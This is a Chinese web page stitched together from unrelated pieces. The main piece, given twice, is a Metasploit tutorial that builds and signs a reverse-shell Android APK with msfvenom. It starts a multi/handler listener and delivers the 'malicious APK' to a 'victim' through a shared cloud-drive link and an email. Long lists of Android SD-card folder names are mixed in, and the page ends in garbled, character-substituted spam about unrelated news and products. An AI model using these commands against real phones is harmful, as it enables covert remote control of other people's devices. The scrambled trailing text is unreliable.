3、手机:msf文件
这就好比,系统记住了qq账号和密码,你重登不用重新输入,属于后台进程,没有登录也没有掉线
文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom *** android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
这是我们切换到安卓模拟器。
msf 手机 *** 产生的的一个文件夹。
1、Android 比较重要的文件夹,里面是一些程序数据,比如google map的地图缓存。
2、AndroidOptimizer 安装“安卓优化大师”后生成的文件夹
3、AndroidSDLPAL 解压AndroidSDLPAL_95.zip,得到AndroidSDLPAL文件夹
4、babyplan_caches 宝贝全计划缓存文件
5、baidu 顾名思义,掌上百度、百度输入法之类程序的缓存文件夹。
6、BaiduMap 百度地图文件夹"
7、BcgmDict"
8、Beats 跳舞机之类的游戏
9、boyaa_texas_v2 得克萨斯扑克游戏
10、cache
11、camera3601
12、chinapay
13、DCIM 相机的缓存文件夹。
14、documents Documents To Go 的相关文件夹。
15、DomobInterstitial 是水果忍者里面弹出广告和一些照片
16、download 下载文件夹
17、downloaded_rom 系统更新文件夹
18、droidhen 用手机当电脑摄象头软件的文件夹
19、DX-Theme 点心桌面软件文件夹
20、ea EA出品的游戏(我的是极品飞车)
21、gameloft gameloft/games文件夹是存放游戏数据的。Gameloft的大型游戏都有几十MB到上百MB的游戏数据与主程序分开存放。你安装完相应的游戏后,可以打开wifi再运行游戏,会自动下载游戏数据资料到这个文件夹;或者也可以不开wifi,从网上下载相应的游戏数据包解压后放到gameloft/games文件夹下面。
22、gfan 机锋论坛
23、Go NoteWidget 透明便签软件的文档记录
24、GOLauncherEX GO桌面的缓存文件夹,想换字体的话,字体文件放在这个文件夹的fonts目录下。
25、GoStore GO桌面留下的文件夹!
26、果合移动广告,是个广告软件的文件夹!一般可能是缓存的软件在里面,如果他自动生成的话就可能不好删除了!
27、iReader 顾名思义,ireader的缓存文件夹。
28、LiveBeautyle 腿模
29、LOST.DIR 卡上丢失或出错的文件会跑这里,此目录无用,删了会自动生成。
30、miliao 顾名思义,米聊的缓存文件夹。
31、MIUI 顾名思义,MIUI的缓存文件夹。
32、mosecurity 这个应该是金山卫士的文件夹!
33、Movies 顾名思义,电影的缓存文件夹。
34、msf 手机 *** 产生的
35、muzhiwan 顾名思义,拇指玩的缓存文件夹。
36、NceEnglish 新概念英译缓存文件夹
37、Notifications 在SD卡任意位置建立名为“notifications”的文件夹,把自己的铃音扔进去 指手机内存(网上查的,我没太看懂)
38、openfeint 顾名思义,openfeint的缓存文件夹 (OpenFeint是一个基于SNS的平台,为iOS和andriod系统提供在线游戏竞技的技术平台)
39、p2pcache 手机快播视频缓存文件夹,(目前快播安卓版使用小文件策略,所以下载完也还是!mv文件,关于下载完合成完整视频的需求已经提交给开发人员评估是否在后续本优化改进)
40、persist_images 一款拍照软件图片存放文件夹
41、Pictures 截屏图片存放处(查了下我的手机是这样)
42、Podcasts 播客文件夹( *** 解释),删了不影响!
43、QDReader 起点读书缓存文件夹
44、QuickPai 顾名思义,QuickPai的缓存文件夹条(我的是二维条码扫描器软件)。
45、qvod 顾名思义,qvod的缓存文件夹
46、ringtones 网上下载 *** 存放文件夹
47、RMS 这是一个你进入木马清理或者系统优化时的临时备份文件
48、ROMs 模拟器文件夹
49、sgsupdate 是三国杀的升级文件安装包
50、snda 盛大 *** 公司出的游戏,如果你卸载了产品这个也可以删掉。
51、spbshell_log SPB主题日志
52、svox一款中文语音插件,可以支持多种语言阅读,第三方语音识别软件
53、TalkingFriends 会说话的tom猫录制的视频文件所保存的目录。
54、Tencent ,腾讯软件的缓存目录。
55、tmpcache 酷我音乐下载时缓存文件夹
56、ttpod ttpod是天天动听的安装目录,里面会有一些文件夹都是相关功能的目录,一般会有:data—系统目录,skin—皮肤目录,lyrics—歌词目录,log—日志文件目录(有关天天动听运行的一些记录,如果运行有问题,log.txt这个文件可以很直观的看出是哪一个环节出了问题。)
57、UCDownloads UCweb浏览器下载文件缓存的保存目录。
58、UCMobileConfig UC浏览器中的配置文件
59、youmicache 这是一个广告联盟的广告缓存文件,(你用的其他软件有挂这个联盟的广告就会有这个文件夹,要彻底删掉就要删除那些带这个联盟广告的软件 )
另一种分析 ***
1、.android_secure 是官方app2sd的产物,删了之后装到sd卡中的软件就无法使用了,小心别误删。
2、.Bluetooth 用蓝牙之后就会有这个。0 c+ y- J, _# I1 b$ J
3、.mobo Moboplayer的缓存文件。
4、. *** *** 的缓存文件,定期清除。
5、.quickoffice 顾名思义,quickoffice的缓存文件。
6、.switchpro 顾名思义,switchprowidget(多键开关)的缓存文件。
7、.ucdlres UC迅雷的缓存文件。
8、albumart 音乐专辑封面的缓存文件夹。
9、albums 相册缩略图的缓存文件夹。
10、Android 比较重要的文件夹,里面是一些程序数据,比如google map的地图缓存,误删掉后地图还需重新下载。
11、backups 一些备份文件,比如联系人导出到SD卡时会导入到此文件夹。
12、baidu 顾名思义,掌上百度、百度输入法之类程序的缓存文件夹。
13、bugtogo 系统出现问题的时候会形成一些报告文件,存放于此文件夹。
14、cmp 个人判断是音乐的缓存文件夹。
15、data 同样是缓存数据的文件夹,与Android性质类似。
16、DCIM 相机的随机缓存文件夹,一些功能设置参数的记录 ,及时整理清除。
17、documents Documents To Go 的相关文件夹。
18、etouch 易行的缓存文件夹。
19、extracted androzip等解压缩软件默认的解压目录。
20、gameloft gameloft游戏数据包存放的文件夹。
21、handcent 顾名思义handcent(超级短信)数据文件夹。
22、handyCurrency 货币汇率相关的文件夹,装了handycalc(科学计算器)之后才会有。
23、ireader 顾名思义,ireader的缓存文件夹。
24、KingReader 开卷有益的缓存文件夹。
25、LazyList Applanet(黑市场)的缓存目录,也许和其他程序也有关,暂时不太清楚,慎重使用。
26、LOST.DIR 卡上丢失或出错的文件会跑这里,此目录无用,删了会自动生成。
27、moji 顾名思义,墨迹天气的缓存目录。
28、MusicFolders poweramp产生的缓存文件夹。
29、openfeint 顾名思义,openfeint的缓存文件夹。
30、Picstore 图片浏览软件建立的一个目录。
31、Playlists 播放列表的缓存文件夹。
32、renren 顾名思义,人人网客户端的缓存文件夹。
33、screenshot 貌似是截屏图片保存的目录,不过我不记得自己装过screenshot这个软件,或许不好用删了。
34、ShootMe 顾名思义 shootme截屏后图片文件保存的目录。
35、SmartpixGames Smartpix Games出品游戏的缓存文件夹,比如Jewellust。
36、sogou 顾名思义,搜狗拼音输入法的随机缓存文件夹)
37、SpeedSoftware RE文件管理器的缓存文件夹。
38、SystemAppBackup SystemApp remove (深度卸载)备份系统文件后,备份文件保存的目录。
39、TalkingFriends talking tom(会说话的tom猫)录制的视频文件所保存的目录。
40、Tencent 顾名思义,腾讯软件的缓存目录,比如 *** 。(与上面的. *** 文件夹并不相同)
41、TitaniumBackup 钛备份备份的程序所保存的目录。
42、TunnyBrowser 感觉是海豚浏览器的缓存目录,但为什么叫这个名字?,金枪鱼浏览器.....
43、UCDLFiles UC迅雷下载文件的保存目录。
44、UCDownloads UCweb浏览器下载文件缓存的保存目录。
45、VIE Vignette (晕影相机)的缓存目录。
46、V"PN 顾名思义,V|PN数据的缓存目录。(“|”为了反和谐)
47、yd_historys 有道词典搜索历史的缓存目录
48、yd_speech 有道词典单词发音的缓存目录。
49、youmicache 删掉后还会自动生成,悠米广告的缓存目录,广告程序内嵌在其程序中,没用别装有米。
50、Glu Glu系列游戏的资料包存放地,如3D猎鹿人,勇猛二兄弟等。
51、apadqq-images *** for pad 的缓存目录。
52、DunDef 地牢守护者的数据包。
53、KuwoMusic 顾名思义,酷我音乐的相关文件夹。
54、MxBrowser 遨游的缓存目录。
55、Camera360 相机camera360的随机缓存目录,可以定期清除。
56、TTPod 顾名思义,天天动听的缓存目录。
57. My documents 自己手机启用各种程序任务记录文档 定期清除 时间长了会积累很多 占用SD卡内存。
58. .nomedia 手机中隐藏的音频 图片文件夹 可以自设在相关文件夹中。
59. media(媒体文档) 使用 *** 通话录音 或在线浏览视频等媒体 产生的音频文件 记录存档的目录 。
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom *** android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
1、从https://code.google.com/archive/p/android-x86/downloads下载android x86的iso。
2、使用vmware创建一个内核版本为2.6的虚拟机。
3、挂载镜像,启动虚拟机。
4、进入Live模式。
5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。
另外要允许安卓安装来历不明的apk。
切换回Kali,我们发现创建了一个新的会话。
然后你就可以为所欲为的操作这台“手机”了。
msf 手机 *** 产生的,这个直接删除, *** 2012乱七八糟的日志呀调试什么的记录文件,不过删掉之后还是会自动生成的
LOST.DIR是专门收集Android系统运行时意外丢失的文件而设置的文件夹,其收集的内容包括系统因为意外而没能保存的各类 内存 、交换、暂存等数据, 软件 的缓存数据、以及其他各类文件。只要系统发生意外(如软件突然无法正常运行),便会将发生意外的文件移到此目录下,以数字序列名称代替该文件的扩展名。注意:由于LOST.DIR文件夹的特殊作用,里面的文件都是“意外而生”,因此可以删除里面的文件,但请不要删除LOST.DIR文件夹
都是可以删掉的 我一看到他积压过多就会删
据少乡网 二0 二 一年 一0月 二0日0 二:0 九: 一 二的最新宣布 ,微专网友@江西游览播送爆料。 安然 夜光降 之际,事宜 ,正在网上炒患上满城风雨,激发 齐网冷议! 据悉,酒店归应父子房间遭生疏 男刷卡之后以至借有人填没牵走她的谁人 男佳宾。疑惑 没门来私司事情 。相比也便是...
点击蓝字咱们 CCTV- 一0 二0 二0. 八. 二 二 三: 二 六播没 《外国印象圆志》安徽卷 宿紧篇 宿紧篇 预报 片 唐地宝十四年(私元 七 五 五年),李皂为躲“安史之治”, 自汴州,即古河北谢启北奔。相传李皂此时 曾经游历至宿紧,正在北台山的 对于酌亭,取时任县令的闾...
拍售成果 | 二0 二 一寿山石拍售会·祸修西北春拍早场 祸修西北拍售 博场疑息:「尚臻」寿山石雕珍品早场 拍售空儿: 二0 二 一. 一0. 二 九 / 二0:00 拍品号:00 一 何光速刻《志正在千面》椭方章 寿山石(芙蓉) 规 格: 九. 二× 三. 四× 一. 八cm 估 ...
菲星野用下浑摄像机HDV 九 八0没有到二千 二00 八年0 五月 一 三日 一0: 三 一做者:编纂 :杨朝文章没处:泡泡网本创分享 二00 八年南京奥运的光降 ,对付 咱们通俗 百年去说是冲动 的一年,是可贵 一逢的一年,是没有容错过的一年。粗彩的火把 通报 ,粗彩的演出 迎悲运动 ,粗彩的赛事...
姚鑫疏风解毒胶囊安徽积仁药业有限私司$ 二 七去自立 乱:祛风浑冷,解毒利吐。用于慢性上吸呼叙熏染 风冷证,表示 为发烧 、恶风、吐疼、头疼、鼻塞、鼻涕污浊 、咳嗽。扩展 阿莫西林颗粒珠海联邦造药有限私司外山分私司$ 七. 九去自顺应 症:用于高列敏感细菌(没有发生 -内酰胺酶的菌株)惹起的熏染 :...
立飞机否以带电池吗?咱们去看看相闭划定 。立飞机否以带电池吗?出有。 一.乘客没有许可 正在托运转李外携带锂电池。 二.乘客否以携带消费类电子装备 (脚表、计较 器、相机、脚机、条记 原电脑、摄录机等)。)露有锂或者锂离子电池求小我 运用。备用电池必需 零丁 掩护 以防欠路,只可搁正在脚提止李外携带...